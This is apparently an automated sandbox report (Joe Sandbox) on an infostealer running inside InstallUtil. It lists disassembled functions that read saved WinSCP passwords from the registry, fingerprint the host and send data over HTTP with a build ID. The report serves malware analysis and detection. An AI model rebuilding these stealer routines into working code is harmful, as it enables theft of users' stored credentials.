                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040756A
                                                                                                                  • _memmove.LIBCMT ref: 00407578
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00407586
                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 00407594
                                                                                                                  • _memmove.LIBCMT ref: 004075A1
                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 004075B6
                                                                                                                  • HttpSendRequestA.WININET(00000000,?,00000000), ref: 004075C4
                                                                                                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00407621
                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040762C
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00407638
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00407644
                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406E7C
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                  • String ID: "$"$"$"$"$------$------$------$------$------$------$2ee1445fc63bc20d0e7966867b13e0e1$build_id$mode$status$task_id
                                                                                                                  • API String ID: 3702379033-3387599942
                                                                                                                  • Opcode ID: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
                                                                                                                  • Instruction ID: f28151e3697947f206a0980c25f575650e410a772d733d80a29dba40e216d304
                                                                                                                  • Opcode Fuzzy Hash: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
                                                                                                                  • Instruction Fuzzy Hash: 7552897194016D9ACF61EB62CD46BCCB3B5AF04308F4184E7A51D73161DA746FCA8FA8
                                                                                                                  Function 0040E186 Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325registryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 0040E1B7
                                                                                                                  • _memset.LIBCMT ref: 0040E1D7
                                                                                                                  • _memset.LIBCMT ref: 0040E1E8
                                                                                                                  • _memset.LIBCMT ref: 0040E1F9
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
                                                                                                                  • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E276
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E29D
                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
                                                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
                                                                                                                  • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
                                                                                                                  • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                  • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                  • API String ID: 463713726-2798830873
                                                                                                                  • Opcode ID: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                                                                  • Instruction ID: 1c66541d4828bd9326f921050ea70c7b79589cb9660c5b8585550bf775721ac0
                                                                                                                  • Opcode Fuzzy Hash: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                                                                  • Instruction Fuzzy Hash: B5D1D6B295012DAADF20EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5
                                                                                                                  Function 00405F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466networkstringmemoryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 918 405f39-405ffe call 410519 call 404ab6 call 4104e7 * 5 InternetOpenA StrCmpCA 933 406000 918->933 934 406006-40600c 918->934 933->934 935 406012-40619c call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 934->935 936 4066ff-406727 InternetCloseHandle call 408048 934->936 935->936 1012 4061a2-4061dc HttpOpenRequestA 935->1012 942 406766-4067ec call 402920 * 4 call 401cde call 402920 call 41d016 936->942 943 406729-406761 call 410549 call 410609 call 41058d call 402920 936->943 943->942 1013 4061e2-4061e8 1012->1013 1014 4066f3-4066f9 InternetCloseHandle 1012->1014 1015 406206-406690 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA 1013->1015 1016 4061ea-406200 InternetSetOptionA 1013->1016 1014->936 1159 4066d2-4066ea InternetReadFile 1015->1159 1016->1015 1160 406692-40669a 1159->1160 1161 4066ec-4066ed InternetCloseHandle 1159->1161 1160->1161 1162 40669c-4066cd call 410609 call 41058d call 402920 1160->1162 1161->1014 1162->1159
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                    • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                    • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                  • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                  • lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,2ee1445fc63bc20d0e7966867b13e0e1,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040660C
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040661E
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040662B
                                                                                                                  • _memmove.LIBCMT ref: 00406639
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00406647
                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
                                                                                                                  • _memmove.LIBCMT ref: 00406662
                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
                                                                                                                  • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
                                                                                                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004066ED
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004066F9
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00406705
                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                  • String ID: "$"$"$------$------$------$------$2ee1445fc63bc20d0e7966867b13e0e1$build_id$mode
                                                                                                                  • API String ID: 3702379033-116134722
                                                                                                                  • Opcode ID: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
                                                                                                                  • Instruction ID: 82dd920f4857eb4424cccb8e833476094bcda5e32b3baf042c939ae059a0737f
                                                                                                                  • Opcode Fuzzy Hash: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
                                                                                                                  • Instruction Fuzzy Hash: FF22B9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8
                                                                                                                  Function 00418643 Relevance: 48.2, APIs: 32, Instructions: 154libraryloaderCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1262 418643-418653 call 41859a 1265 418844-4188a1 LoadLibraryA * 5 1262->1265 1266 418659-41883f call 407d47 GetProcAddress * 20 1262->1266 1268 4188a3-4188b0 GetProcAddress 1265->1268 1269 4188b5-4188bc 1265->1269 1266->1265 1268->1269 1270 4188e7-4188ee 1269->1270 1271 4188be-4188e2 GetProcAddress * 2 1269->1271 1273 4188f0-4188fd GetProcAddress 1270->1273 1274 418902-418909 1270->1274 1271->1270 1273->1274 1275 41890b-418918 GetProcAddress 1274->1275 1276 41891d-418924 1274->1276 1275->1276 1278 418926-41894a GetProcAddress * 2 1276->1278 1279 41894f 1276->1279 1278->1279
                                                                                                                  APIs
                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418684
                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041869B
                                                                                                                  • GetProcAddress.KERNEL32 ref: 004186B2
                                                                                                                  • GetProcAddress.KERNEL32 ref: 004186C9
                                                                                                                  • GetProcAddress.KERNEL32 ref: 004186E0
                                                                                                                  • GetProcAddress.KERNEL32 ref: 004186F7
                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041870E
                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418725
                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041873C
                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418753
                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041876A
                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418781
                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418798
                                                                                                                  • GetProcAddress.KERNEL32 ref: 004187AF
                                                                                                                  • GetProcAddress.KERNEL32 ref: 004187C6
                                                                                                                  • GetProcAddress.KERNEL32 ref: 004187DD
                                                                                                                  • GetProcAddress.KERNEL32 ref: 004187F4
                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041880B
                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418822
                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418839
                                                                                                                  • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041884A
                                                                                                                  • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041885B
                                                                                                                  • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041886C
                                                                                                                  • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
                                                                                                                  • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041888E
                                                                                                                  • GetProcAddress.KERNEL32(75A70000,004184C2), ref: 004188AA
                                                                                                                  • GetProcAddress.KERNEL32(75290000,004184C2), ref: 004188C5
                                                                                                                  • GetProcAddress.KERNEL32 ref: 004188DC
                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,004184C2), ref: 004188F7
                                                                                                                  • GetProcAddress.KERNEL32(75450000,004184C2), ref: 00418912
                                                                                                                  • GetProcAddress.KERNEL32(76E90000,004184C2), ref: 0041892D
                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418944
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2238633743-0
                                                                                                                  • Opcode ID: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                                                                  • Instruction ID: 2c76b628124a1797fdce28c748a09696ce6250a2eaa67b4899ff399dadce2328
                                                                                                                  • Opcode Fuzzy Hash: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                                                                  • Instruction Fuzzy Hash: 96711675910312AFEF1ADF60FD088243BA7F70874BF10A426E91582270EB374A64EF55
                                                                                                                  Function 00413B86 Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674stringCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1280 413b86-4145a5 call 4104e7 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4115d4 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411684 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4109a2 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 GetCurrentProcessId call 41224a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410b30 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411807 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411997 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c85 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c53 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411563 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410ddb call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410d2e call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410f51 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411007 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410fba call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411119 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411192 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4114a5 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411203 call 4105c7 call 41058d call 402920 * 2 call 411203 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 401cfd lstrlenA call 4104e7 call 416e97 call 402920 * 2 call 401cde
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
                                                                                                                    • Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
                                                                                                                    • Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
                                                                                                                    • Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16
                                                                                                                    • Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
                                                                                                                    • Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                                    • Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                    • Part of subcall function 004115D4: RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
                                                                                                                    • Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                    • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                    • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                    • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                    • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                    • Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                    • Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                    • Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                                  • GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB
                                                                                                                    • Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                    • Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                    • Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                    • Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                    • Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                    • Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                    • Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                    • Part of subcall function 00411807: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                    • Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                    • Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                    • Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                    • Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
